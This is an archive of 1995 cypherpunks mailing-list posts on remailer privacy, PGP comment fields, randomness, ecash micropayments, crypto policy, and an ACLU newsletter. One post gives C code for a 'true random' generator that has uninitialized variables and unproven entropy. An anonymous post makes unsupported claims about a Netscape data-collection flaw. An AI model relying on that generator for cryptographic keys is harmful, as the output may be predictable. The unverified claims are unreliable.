Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From stewarts at ix.netcom.com  Wed Nov  8 16:42:49 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 9 Nov 1995 08:42:49 +0800
Subject: expiration dates on cryptography
Message-ID: <199511082002.MAA25560@ix4.ix.netcom.com>


[ Hmmm, maybe I'd better get this message out quickly, before it expires... :-]

At 07:21 AM 11/8/95 -0500, John Curtis <jbell at capecod.net> wrote:
>The discussion between Mr. May and Mr. Shields concerning
>time-release cryptography raised an interesting question in my 
>mind.
>
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets.  Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?

Decryption is equivalent to knowing a secret plus doing some work.

There are two ways to make information available/unavailable -
by depending on calculations from known data, or by having people
agree to publish/delete it.  The former method is trustable,
but doesn't have time built in to it - either you know stuff or you don't.
The latter method is harder to trust - you can build contractual mechanisms
to encourage people to keep their commitments, and use crypto methods like
splitting shared secrets to limit the impact of some of them not keeping them -
but it's basically not cryptographic.  

Getting people to keep information secret for a while and then publish
is possible; that's within their control.  Getting people to keep information
public, and then delete all the copies they own is possible, but if the
information is _public_, anybody in the world could have a copy - deleting
it requires finding them all, and getting them all to agree to delete it.
That's _much_ harder.

You could build a system where an escrow agent keeps a piece of information
private, but available upon request, and deletes it on a certain date.
That lets you know that _if_ nobody's asked for the information by then,
and the agent has done its job, that nobody else will be able to decrypt it.
Again, you can secret-share among multiple agents to decrease the impact
of defaults (either failure-to-delete or failure-to-deliver.)

A related approach is for the agent to provide a service of decrypting data
encrypted with the agent's public key, and agreeing only to decrypt data
before or after some date specified in the message.

Another technique you can use is to for the agent to keep the data until
paid for delivery; the retrieval token includes a digital check
with an expiration date.  In this case, you're trusting the bank to 
not honor the check after its expiration date, and the escrow agent not to
deliver the data without getting paid.  For this service, you want checks
rather than cash - if the check goes stale, the money is still in your account.

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From patl at catfish.lcs.mit.edu  Wed Nov  8 16:43:27 1995
From: patl at catfish.lcs.mit.edu (Patrick J. LoPresti)
Date: Thu, 9 Nov 1995 08:43:27 +0800
Subject: PGP Comment feature weakens remailer security
Message-ID: <199511082151.QAA05650@catfish.lcs.mit.edu>


-----BEGIN PGP SIGNED MESSAGE-----

 bill.stewart> So, for safety, either turn off PGP comments before
 bill.stewart> using it with remailers, or wipe out the comments by
 bill.stewart> hand before each layer of encryption (easy to do with
 bill.stewart> GUI-based systems like Private Idaho; I don't know if
 bill.stewart> premail lets you do this or not.)

Incidentally, Mailcrypt's remailer support strips the comment field
after each encryption, and has done so since version 3.2.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMKEmVHr7ES8bepftAQEPSgP9FJYeKUSZKyFN/VWIwLjKIaDVzPtzyqHR
tbj1UqbDl1trrKCoV6uud5qfK/FQwqQylnv1YsYNIVPPav66ImUvgSaXUMvZJBvC
8vinQI66s3M1PBJ8VIaLuVtay826JDazGHEexHpDLwNVGLdJq0RrNLVr2H9oLA8g
5aE9MHVfAcM=
=MdHQ
-----END PGP SIGNATURE-----





From raph at CS.Berkeley.EDU  Wed Nov  8 16:44:18 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Thu, 9 Nov 1995 08:44:18 +0800
Subject: PGP Comment feature weakens remailer security
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <199511081943.LAA24863@kiwi.cs.berkeley.edu>


   Point well taken.

   I'm seriously considering completely disabling the PGP comment
feature when invoked from premail. In fact, that's what the new code
does right now.

   On an unrelated topic... cypherpunks like to count bits, right?
What is the correct number of pseudorandom bits to use in a MIME
multipart separator? If the data has a line which matches the
separator, the message is corrupted. Of course, if you can take
multiple passes through the data, you can simply verify that it does
not contain a line which matches the separator. But if you're
restricted to a single pass, then the only way to do it is to use a
randomly generated separator.
   I figure that 128 bits should _definitely_ be enough (that's what
is in the new premail code now). Even 64 bits should ensure that it is
unlikely that anyone will ever experience message corruption over the
expected lifetime of premail. However, it makes me nervous. What do
people think?

Raph





From netsurf at pixi.com  Wed Nov  8 16:54:31 1995
From: netsurf at pixi.com (NetSurfer)
Date: Thu, 9 Nov 1995 08:54:31 +0800
Subject: PGP Comment feature weakens remailer security
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951108054335.22856D-100000@akamai.pixi.com>



On Tue, 7 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> to protect the privacy of communications.  PGP can bite you.
> The PGP comment feature lets you stick one (or more?) lines of comment
> into your encrypted messages, after the Version: line but before the
> encrypted message body.  If you use the PGP comment feature to say something

---- 8< snip

> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.7.1
> Comment: PGP available outside U.S.A. at ftp.ox.ac.uk
> 

You are using Viacrypt PGP, which has a release out which fixes the 
comment "feature" - contact them for an upgrade.

This was fixed in the freeware version some time ago as well.

-NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |     finger for full PGP key        >
 "  " / \ " |Honolulu, HI  96830    |====================================>
\"  "/ G \" |Serendipitous Solutions|    http://www.pixi.com/~netsurf   >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>






From jya at pipeline.com  Wed Nov  8 17:00:27 1995
From: jya at pipeline.com (John Young)
Date: Thu, 9 Nov 1995 09:00:27 +0800
Subject: DUF_ibf
Message-ID: <199511081552.KAA06338@pipe3.nyc.pipeline.com>


   Pal has provided a gopher-FBI paper:


   "Computer Crime Categories: How Techno-criminals Operate."
   By David L. Carter, a professor in the School of Criminal
   Justice, Michigan State University

   Types of Computer Crimes

      Computer As the Target
      Computer As the Instrumentality of the Crime
      Computer Is Incidental to Other Crimes
      Crimes Associated With the Prevalence of Computers

   Perspective on Legal Issues

   Special Problems with Computer-Related Crime

      Intellectual Property
      Malfeasance by Computer
      International Issues

   Conclusion

      Criminals have adapted the advancements of computer
      technology to further their own illegal activities.
      Unfortunately, their actions have far out-paced the
      ability of police to respond effectively.


   DUF_ibf  (21 kb in two parts)














From anonymous-remailer at shell.portal.com  Wed Nov  8 17:13:43 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 9 Nov 1995 09:13:43 +0800
Subject: DejaNews all over again
Message-ID: <199511082306.PAA24448@jobe.shell.portal.com>


On Wed, 8 Nov 1995, Perry E. Metzger wrote:

> anonymous-remailer at shell.portal.com writes:
> > I wish that Detweiler could (seriously) go back to wherever he came from. 
> 
> What a fascinating statement to make, considering that you are
> probably Detweiler.

Fascinating.  

First, I'm accused of being noted computer viral expert, 
Dr. Frederick B.  Cohen, (simply because he agrees with my assessment of
the critical algorithm flaw in Netscape Navigator) and now I'm accused of
perhaps being at the other end of the spectrum.  Of being Detweiler,
simply because he can take my signature and identity by signing an email,
as Alice de 'nonymous or simply accusing me of posting in his "style". 

I see that the character assassination sport continues, and I am now a
targetted.  Hunter become hunted.  I wonder why??  And why, by of all
people, Perry?  Is it perhaps because, I speak the truth, and the truth
makes people very, very nervous.  Is it because the flaw which is in the
Navigator product is woven into the code fabric, and can't be *fixed*. 

Afterall, Netscape (and AT&T) have had, over THREE WEEKS to work on this
problem or to make some form of public comment, and have done nothing, but
put some of their programmers -- unofficially ... speaking for myself ...
not speaking for the Company -- programmers on this list

Meanwhile people are having their PGP keyrings collected, their passwords
monitorred, and all of the information -- even information which they have
NOT posted to Usenet, information that is simply on their personal hard
drives, or on a private corporate network that is behind a firewall --
collected by anyone who actualy understands *how* to use Netscape
Navigator's standard features to do it. 

And so the question is: Why am I having my character asassinated while
this threat continues??  And while the loss and damage continues.  Why
are Netscape and AT&T not mitigating the damage?

Is it because what I say is simple common sense stripped of the veneer of
"technical language" and jargon??  And can't be *commented* on or *fixed*. 

Is this the fear which any truth teller faces, not only on the Internet,
but in any forum where they try to challenge Goliath. 

Maybe, that's one reason to post anonymously.

To clear the record definitively, I am neither Detweiler nor Dr.
Frederick B. Cohen, and I am not the issue.  I am simply myself, and I
will _reveal_ my identity to the international public once the timing
is appropriate.

If anyone wants to know who I am, they can contact the PR department
of AT&T or Netscape and ask.

(Their address can be requested from either postmaster at att.com or 
postmaster at netscape.com, respectively.)

Both companies have an email address for me, and would _likely_ *cough*
forward any email enquiries to me without any editing.  That way,
everything is done clearly and out in the open.  Nothing hidden, and
nothing private, and none of my comments will become "their sole property
to be used in their sole discretion". 

Neither company can accuse me of attacking them with daggers in the
dark of night, from behind a shield of anonymity, when I advocate
public open disclosure and commentary.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From frank at funcom.no  Wed Nov  8 17:14:16 1995
From: frank at funcom.no (Frank Andrew Stevenson)
Date: Thu, 9 Nov 1995 09:14:16 +0800
Subject: True Random (short c-source)
Message-ID: <Pine.SGI.3.91.951108165325.25592A-100000@odin>


I have written a short random number generator which appears to produce
reasonable random numbers even in DOS, at the heart of the code is the
short function fGetRand, the amount of entropy derived from this
function varies from >1 to >>6 depending on system load, I haven't
made any effort to whiten it at all. I am not making any claims about
its usefulness. I am only trying to demonstrate the ease at which
good random number may be obtained. Any comments and analysis will be
mostly welcome, the source is hereby placed in the public domain:

I have used WATCOM10 to compile and test under DOS/WIN95, where
clock is running at 18hz. I have also tested on IRIX with impressive
results.

--- START ----
#include <time.h>
#include <stdio.h>

int   fGetRand (void);

main (void) {
   long vCount;
   FILE *out;
   int byte;
   int tick;

   out=fopen("random.bin","wb");
   if(out==NULL) {
      printf("cant write to file random.bin\n");
      exit(1);
   }

   for(vCount=1;vCount<=512;vCount++) {
      tick=fGetRand()&0x01;
      byte=byte+byte+tick;
      if((vCount & 0x7)==0) fputc((char)byte,out);
      fputc((char)tick,out);
   }

   fclose(out);
}


int   fGetRand (void) {
   int count;
   clock_t tick;

   tick=clock();
   while(tick==clock()) count++;

   return (count);
}
----- END -----

PGP encrypted mail preferred, finger for key.
The above views are ONLY endorsed by BoggleMind Inc. (not to be confused
with MindBoggle Ltd.)







From hfinney at shell.portal.com  Wed Nov  8 17:35:07 1995
From: hfinney at shell.portal.com (Hal)
Date: Thu, 9 Nov 1995 09:35:07 +0800
Subject: ecash speed
Message-ID: <199511082345.PAA02628@jobe.shell.portal.com>


A few days ago I got my ecash account set up with the Mark Twain bank.
Presently only one merchant is officially listed at <URL:
http://www.marktwain.com/shops.html>, Delorie Software.  As I understand
it, only people with merchant accounts are eligible to be listed here.
However, you don't have to have a merchant account to receive ecash or to
set up shop software.  If anyone else has set up a shop to receive Mark
Twain ecash using a user account, perhaps they could post here and we
could keep a list of unofficial vendors.

The other thing I wanted to write about is ecash speed.  One idea people
have had is to use ecash for micropayments, such as one cent to read a
web page.  The question is, is the current ecash software sufficiently
fast for this?  Maybe someone could set up a site using either Twain ecash
or DigiCash ecash which actually charged you a penny for each page you
browsed around.  It would be interesting to see how much of an obstacle
it presents in browsing the web.  The impression I've had from the few
times I've used ecash is that in fact it does slow things down way too
much for this to be practical.  But it would be good to actually do the
experiment.

One reason I was thinking about this is reading a new paper by Rivest and
Shamir, <URL:http://theory.lcs.mit.edu/~rivest/RivestShamir-mpay.ps>.  It
is about a couple of proposed systems for micropayments, specifically
oriented towards the penny-per-web-page model.  They are offline systems,
designed so that a minimum of calculation is done by the vendor, user and
bank.  So they should be very efficient.

However, the big problem is that they are not anonymous.  The cash
tokens are recognizable by the bank when spent tokens are sent in by
the vendors - the bank knows who spent them.  Maybe for penny level
transactions that is not a big deal, although if for-pay web browsing
becomes common then it does seem like it would present a privacy
threat.  Every web site you visit (not the specific pages, but the
overall site names) would be known by the bank - quite a significant
piece of marketing data.

The point is that if the anonymity afforded by ecash is too costly in
terms of time, then we may end up stuck with a non-anonymous system
simply because that is the only one efficient enough to work.  It would
be good to find out if that is a serious problem.

Hal Finney





From loki at obscura.com  Wed Nov  8 17:52:24 1995
From: loki at obscura.com (Lance Cottrell)
Date: Thu, 9 Nov 1995 09:52:24 +0800
Subject: PGP Comment feature weakens remailer security
In-Reply-To: <199511081943.LAA24863@kiwi.cs.berkeley.edu>
Message-ID: <Pine.3.89.9511081605.A20339-0100000@obscura.com>


I think you are fine if the odds of corrupting the message are less than 
the odds of getting hit by a a falling meteor while running the program. 
In general there is little point in making any one part of the system 
many orders of magnitude more reliable than any other part.

	-Lance


On Wed, 8 Nov 1995, Raph Levien wrote:

>    Point well taken.
> 
>    I'm seriously considering completely disabling the PGP comment
> feature when invoked from premail. In fact, that's what the new code
> does right now.
> 
>    On an unrelated topic... cypherpunks like to count bits, right?
> What is the correct number of pseudorandom bits to use in a MIME
> multipart separator? If the data has a line which matches the
> separator, the message is corrupted. Of course, if you can take
> multiple passes through the data, you can simply verify that it does
> not contain a line which matches the separator. But if you're
> restricted to a single pass, then the only way to do it is to use a
> randomly generated separator.
>    I figure that 128 bits should _definitely_ be enough (that's what
> is in the new premail code now). Even 64 bits should ensure that it is
> unlikely that anyone will ever experience message corruption over the
> expected lifetime of premail. However, it makes me nervous. What do
> people think?
> 
> Raph
> 

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From anonymous-remailer at shell.portal.com  Wed Nov  8 17:56:45 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 9 Nov 1995 09:56:45 +0800
Subject: PGP Comment feature weakens remailer security
Message-ID: <199511090020.QAA12479@jobe.shell.portal.com>


On Wed, 8 Nov 1995, Raph Levien wrote:

>    On an unrelated topic... cypherpunks like to count bits, right?

Mmmm, sometimes we do ... <g>

Sometimes we even think, if I were a lil wa'bbit, where would I go hide
... especially when we do a bad Elmer Fudd impression of Bugs Bunny. <p>

> What is the correct number of pseudorandom bits to use in a MIME
> multipart separator? If the data has a line which matches the
> separator, the message is corrupted.  Of course, if you can take
> multiple passes through the data, you can simply verify that it does
> not contain a line which matches the separator. But if you're
> restricted to a single pass, then the only way to do it is to use a
> randomly generated separator.

An interesting problem.  

If you are going to take multiple passes, and do top-down and bottom up
analysis, then you can't really parse on the fly. It pretty much has to be
a batch job, I think.  You have to get your data, and then check it.  You
can't simply *trust* that there is not any corruption, and pass all of
your data through. 

And if you're going to parse in a single pass, then we're back to the 
problem of monkeys sitting at typewriters and Shakespeare's sonnets.

>    I figure that 128 bits should _definitely_ be enough (that's what
> is in the new premail code now). Even 64 bits should ensure that it is
> unlikely that anyone will ever experience message corruption over the
> expected lifetime of premail. However, it makes me nervous. What do
> people think?

Unfortunately, it's not quite that simple.  

The likelyhood of corruption is not based on each past run.  It's just 
like rolling dice.  The odds of rolling boxcars is 1 in 36 (I think) no 
matter how many prior times, you've rolled boxcars.

Twenty passes doesn't influence whether you crap out or not on a single
roll.  Nothing *remembers* past performance to ensure that something
doesn't happen (or happens) many, many times in a row.  I guess, this is
why Atlantic City, Baden Baden, and Las Vegas generally do as well as they
do. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From gnu at toad.com  Wed Nov  8 18:16:55 1995
From: gnu at toad.com (John Gilmore)
Date: Thu, 9 Nov 1995 10:16:55 +0800
Subject: "Industry Group Rebuffs U.S. on Encryption" (NYT 8Nov95, C3)
Message-ID: <9511090050.AA01828@toad.com>


A group of 37 companies and trade and privacy associations sent a
letter to Al Gore yesterday, complaining about Clipper-II and crypto
export controls, and promising to send their own policy proposals
to Congress and the Administration within six months.

It's a short story.  I'll leave the exact text to John Young :-).
I've heard that there's a better story in the Washington Post today, too.
I expect we'll see the letter itself within a day or two.

	John Gilmore





From adam at lighthouse.homeport.org  Wed Nov  8 18:30:41 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Thu, 9 Nov 1995 10:30:41 +0800
Subject: True Random (short c-source)
In-Reply-To: <Pine.SGI.3.91.951108165325.25592A-100000@odin>
Message-ID: <199511090111.UAA07637@homeport.org>


Frank Andrew Stevenson wrote:

| I have written a short random number generator which appears to produce
| reasonable random numbers even in DOS, at the heart of the code is the
| short function fGetRand, the amount of entropy derived from this

	What tests have you done on the output that causes you to say
the random numbers are 'reasonable'?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From Alan.Pugh at internetMCI.COM  Wed Nov  8 18:31:08 1995
From: Alan.Pugh at internetMCI.COM (amp)
Date: Thu, 9 Nov 1995 10:31:08 +0800
Subject: using pgp to make an otp
Message-ID: <01HXEVB6V1QQ91YN41@MAIL-CLUSTER.PCY.MCI.NET>


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: John Curtis              \ Internet:    (jbell at capecod.net)
To:   amp                      \ Internet:    (alan.pugh at internetmci.com)

Subject: RE: using pgp to make an otp

JC> I was confused and answered a question you didn't ask. I guess you
JC> can use PGP to generate a set of pseudorandom numbers.  I'm not sure
JC> that this would be different from  using the IDEA cypher (the
JC> underlying PGP cypher) to generate random numbers.  I am also not
JC> convinced that this would be quicker or cheaper than any number of
JC> other mechanisms.

JC> If I really wanted a true one-time pad, I'm inclined to explore the
JC> thermal noise of a zener diode.

isn't the noise generated by such a diode more accurately described
as chaotic rather than random? i would think that there might be
potential problems with using chaos as a random number source. it
might be somewhat less random than you may think as most chaotic
system's 'noise' operates within definable parameters. (like a lorenz
system). i _would_ think that it would act as a most excellent prng,
but exactly how _truely_ random it actually would be i couldn't say. 
while it may not be _truely_ random, it would most likely be
cryptographically secure though. 

i think generating _true_ randomness is pretty difficult without
measuring something similar to radioactive decay. 

the system that i proposed setting up is, admittedly, a p-otp at
best. i'm much more convinced of this than i was when i initially
proposed it. the comments i've gotten on it were most enlightening.

amp
<0003701548 at mcimail.com> (since 10/31/88)
<alan.pugh at internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
November 9, 1995   11:41
 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMKIvRIdTfgZXlXydAQG0zAf/Y0qX8X6mFa932Egm0PdBZr4RCBHqPccx
5Nb5KZi1jQPRFnoAoEgU6Z6P+SLWCGhZisn1UxvlD2eX6HbbPB/B0mHReoWw/qp2
hI7rWCn+JtSwUvxeno88zFmZ/AreAukm8LNi/PdJp+5lunDgclrOWoR5BklglqT8
iE2nxd6dhbUEKUYXzsN6yEXDRl/tUDiriEVev2YhttTZuyUg9krMa32VtyxyUCeB
UfhidSjgwkNkSO3QQaHVHUCby8NHQJPRdKR4ym8tDfFjNXxieUQKwxi8r/0ofo5g
1UxtBwJICd+/LxOZovtKGYDqHJc4vPRqdY7x4VbTff0FM4i4W0ZpUQ==
=6ty1
-----END PGP SIGNATURE-----






From perry at piermont.com  Wed Nov  8 18:42:30 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 10:42:30 +0800
Subject: ecash speed
In-Reply-To: <199511082345.PAA02628@jobe.shell.portal.com>
Message-ID: <199511090130.UAA13562@jekyll.piermont.com>



Hal writes:
> The point is that if the anonymity afforded by ecash is too costly in
> terms of time, then we may end up stuck with a non-anonymous system
> simply because that is the only one efficient enough to work.  It would
> be good to find out if that is a serious problem.

I suspect that as CPU speed exponentiates this will become less and
less of a problem. It doesn't especially worry me.

Perry





From ACLUNATL at aol.com  Wed Nov  8 18:42:47 1995
From: ACLUNATL at aol.com (ACLUNATL at aol.com)
Date: Thu, 9 Nov 1995 10:42:47 +0800
Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995
Message-ID: <951108171518_82372328@mail04.mail.aol.com>


-----------------------------------------------------------------
November 8, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
-----------------------------------------------------------------
IN THIS ISSUE:

*  ACLU Statement and ACTION ALERT on Federal Wiretap Bill

*  ACTION ALERT on Federal Online Indecency Legislation

*  State Utility Commissions Consider Online Access and Privacy Issues

*  News on Electronic Access to Public Information in Washington State

*  John Perry Barlow Launches Cyberspace Lecture Series Co-Sponsored by the
ACLU of Washington

*  ACLU Student Chapter President at Georgetown University Law Center Writes
About Marty Rimm Controversy

*  Conferences

*  Online Resources from the ACLU National Office and State Affiliates

-----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
-----------------------------------------------------------------
* ACLU Statement and ACTION ALERT on Federal Wiretap Bill

Last week, the ACLU emphatically urged the FBI to withdraw its proposal for
greatly increased wiretapping powers.  "Given the government's own statements
on the usefulness of wiretaps, we can only guess at the FBI's motives," said
Laura W. Murphy, Director of the ACLU's National Washington Office.  "But if
Congress were to allow this system to go into place, we'd have a national
surveillance apparatus that would pale in comparison to the infamous security
state of the former Soviet Union."

"This proposal, Murphy added, "would make the KGB look like privacy
advocates."

"The proposal would dramatically reduce the privacy rights in the United
States because it would -- no matter what the Justice Department says --
result in significant increase in the number of innocent third party
conversations intercepted by law enforcement officials," Murphy said.
 "Already too many innocent conversations -- nearly two million in the last
year alone -- are intercepted by federal and local law enforcement wiretaps."

According to the government's own statistics, 1,800 innocent conversations
are intercepted each and every time a wiretap or other form of electronic
surveillance is placed.

Just last week, the ACLU joined with the National Rifle Association and a
broad coalition of other gun advocates and civil liberties organizations in
calling for Congress to institute a 24-point reform plan for federal law
enforcement.  In a letter to Congress, the groups said that the excesses of
Waco and Ruby Ridge demonstrate that Congress and the Administration must
begin to reign in the powers of federal police authorities.

[The 24-point reform plan and related documents are available on America
Online, at keyword ACLU, under "federal law enforcement reforms."  For an
e-mailed copy of the reform plan, send a message to infoaclu at aclu.org with
"fed law enforcement reform" in the subject line.]

URGENT ACTION NEEDED:

-Call the FBI at 202-252-7296 and urge it to withdraw the proposed
wiretapping system.  You can also find the phone number of the FBI's local
field offices at the FBI web site at http://www.fbi.gov.

-Call the Attorney General at 202-514-2001 and urge her to order the FBI to
withdraw its wiretapping proposal.

-Call your members of Congress and tell them to urge the Justice Department
and the FBI to withdraw the wiretap proposal.  Urge your representatives to
oppose any funding for this wiretap scheme.  You can reach the Capitol
Switchboard at 202-224-3121 for the Senate and 202-225-3121 for the House of
Representatives.

-Call Rep. Bob Barr (R-GA), a former federal prosecutor and leading opponent
of funding effots for wiretap:

     Rep. Bob Barr
     U.S. House of Representatives
     1607 Longworth Building
     Washington, DC 20515
     (202) 225-2931

-Call your own telephone companies, both local and long distance, and urge
them to oppose the wiretap proposal and to stand up for the privacy rights of
their customers instead of becoming the snooping arm of a prying government.

-----------------------------------------------------------------
*  ACTION ALERT on Federal Online Indecency Legislation

The conference committee on the telecommunications bill will soon consider
whether to remove provisions that would make "indecency" a crime in
cyberspace.  On Monday, November 6, we distributed an action alert urging
individuals to call Congress to express opposition to any measures to censor
the Net.

THIS MAY BE YOUR LAST CHANCE TO STOP UNCONSTITUTIONAL RESTRICTIONS ON YOUR
RIGHT TO FREE SPEECH IN CYBERSPACE!!

[You can find the action alert on America Online, at keyword ACLU, under
"threats to civil liberties in cyberspace," or on the Internet at
http://www.vtw.org/]

In addition to the call to action for individual Net users, the ACLU and
People for the American Way obtained signatures from over 75 organizations to
a letter opposing the federal online indecency provisions.  The letter will
be sent to Senator Pressler and Representative Bliley on the conference
committee later this week.

[After 11/13, you can find a copy of the organizational letter on America
Online, at keyword ACLU, under "threats to civil liberties in cyberspace."
 To receive a copy of the letter via e-mail, send a message to
infoaclu at aclu.org with "organizations opposed to online censorship" in the
subject line.]

The ACLU continues to prepare for a constitutional challenge to the online
censorship provisions if they become law.  Please contact Ann Beeson,
beeson at aclu.org, if your organization is interested in being a plaintiff in
this ground-breaking litigation that will define First Amendment rights in
cyberspace.

-----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases)
-----------------------------------------------------------------
*  State Utility Commissions Consider Online Access and Privacy Issues

Many state utilities commissions are considering issues that can affect your
online access and privacy rights, from approving caller ID to defining
universal access.  Online users are urged to stay informed and involved in
utilities commission decisions in their states that may affect cyberspace
rights.  Consumer Project on Technology has put up a list of information
about state utility commissions.  The list includes contact information for
all 50 state utility commissions, and also lists utility consumer advocates
in 40 states.

See http://www.essential.org/cpt/isdn/contacts.html

-----------------------------------------------------------------
*  News on Electronic Access to Public Information in Washington State

A Washington State task force has been examining the issue of electronic
access to information maintained by government agencies.  The ACLU of
Washington submitted comments commending the task force for requiring some
form of free electronic access, and limiting all fees to incremental costs.
 But the task force was criticized for not paying sufficient attention to
privacy, especially increased threats to privacy presented by accumulation of
information on individuals from diverse sources.  

Also in Washington State, King County Superior Court Judge George Finkle
ruled that Geographical Information System databases are public records and
must be made available to the public for nominal copying fees.  (GIS systems
are databases that contain information associated with a physical location,
such as the location of utility cables, public buildings, roads, demographic
information, zoning info, or traffic density.)  As in many locations around
the country, the City of Bellevue had attempted to charge far higher fees for
GIS databases, which were created for government use but also have commercial
value.  This ruling reaffirms the notion that public information should be
available to all, not just those with deep pockets.

-----------------------------------------------------------------
*  John Perry Barlow Launches Cyberspace Lecture Series Co-Sponsored by the
ACLU of Washington

The ACLU of Washington began a series of talks in Seattle to explore the
impact and implications of the technology revolution on art and culture.
 John Perry Barlow, former Grateful Dead lyricist and co-founder of the
Electronic Frontier Foundation, launched the series on November 3rd.
 "Cyberspace is largely about conversation that ultimately could include
everybody on the planet . . . . Cyberspace can be the greatest venue for
freedom of expression humans have ever had," said Barlow.  Barlow talked of
the spiritual dimension of cyberspace, which he sees as an egalitarian
ecosystem with the potential to link "every synapse on the planet."  For him
cyberspace must be a place where anybody can say anything they think without
fear of reprisal.  But he tempered his lyrical vision of cyberculture with a
warning of the dangers of censorship from elected officials who do not
appreciate -- or even understand -- how new forms of communication function.
 "When I visit Congress, I feel like Tom Paine in the Court of King George,"
Barlow quipped.

-----------------------------------------------------------------
*  ACLU-Georgetown University Law Center President Writes Articles on the
Marty Rimm controversy

Alan Lewine, President of the ACLU student chapter at GULC, has written a
series of articles for the Georgetown Law Weekly on the Georgetown Law
Journal's involvement in the controversial publication of Marty Rimm's
purported study of net porn. They are available at
http://www.tripod.com/userland/A/alewine/index.html

-----------------------------------------------------------------
CONFERENCES
-----------------------------------------------------------------
Nov 8, 6 pm: "Regulating the Internet: Should Pornography Have A Free Ride on
the Information Superhighway?"  Benjamin N. Cardozo School of Law, 55 Fifth
Avenue, New York, New York.  Panelists include Nadine Strossen, National
President, ACLU; Bill Burrington, Staff Counsel of the Electronic Frontier
Foundation; and Barbara Bennett Woodhouse, Professor of Law at University of
Pennsylvania Law School.  Sponsored by the Cardozo Arts & Entertainment Law
Journal.

Nov 16, 5 pm: Nadine Strossen (National President, ACLU) speaks on "Defending
Pornography: A Feminist Perspective on New Technologies and Old-Fashioned
Sex," GULC, 600 New Jersey NW, 12th Floor Ballroom, Gewirz Hall.
 Co-sponsored by ACLU-GULC and the Student Bar Association Speakers Fund.

-----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
-----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

-----------------------------------------------------------------
ONLINE RESOURCES FROM ACLU STATE AFFILIATES
-----------------------------------------------------------------
Florida:
ACLU of Pinellas County Florida
http://www.stpt.usf.edu/~greek/aclu.html

Illinois:
Illinois Civil Liberties Union
http://www.aclu-il.org/

Champaign County, Illinois ACLU Chapter
http://www.prairienet.org/cc-aclu/
(The chapter also maintains an Illinois Civil Liberties Alert List.  To
subscribe send a message to cla at prairienet.org)

Indiana:
Indiana Civil Liberties Union
http://www.inetdirect.net/iclu/

South Carolina:
ACLU of South Carolina
http://www.cris.com/~katrinan/aclu/index.html

-----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson at aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu at aclu.org with "subscribe Cyber-Liberties Update" in the subject line
of your message.  To terminate your subscription, send a message to
infoaclu at aclu.org with "unsubscribe Cyber-Liberties Update" in the subject
line.

For general information about the ACLU, write to infoaclu at aclu.org.
-----------------------------------------------------------------
**PLEASE REPOST WITH HEADER INTACT**





From raph at CS.Berkeley.EDU  Wed Nov  8 18:44:36 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Thu, 9 Nov 1995 10:44:36 +0800
Subject: PGP Comment feature weakens remailer security
In-Reply-To: <199511081943.LAA24863@kiwi.cs.berkeley.edu>
Message-ID: <199511090147.RAA31271@kiwi.cs.berkeley.edu>


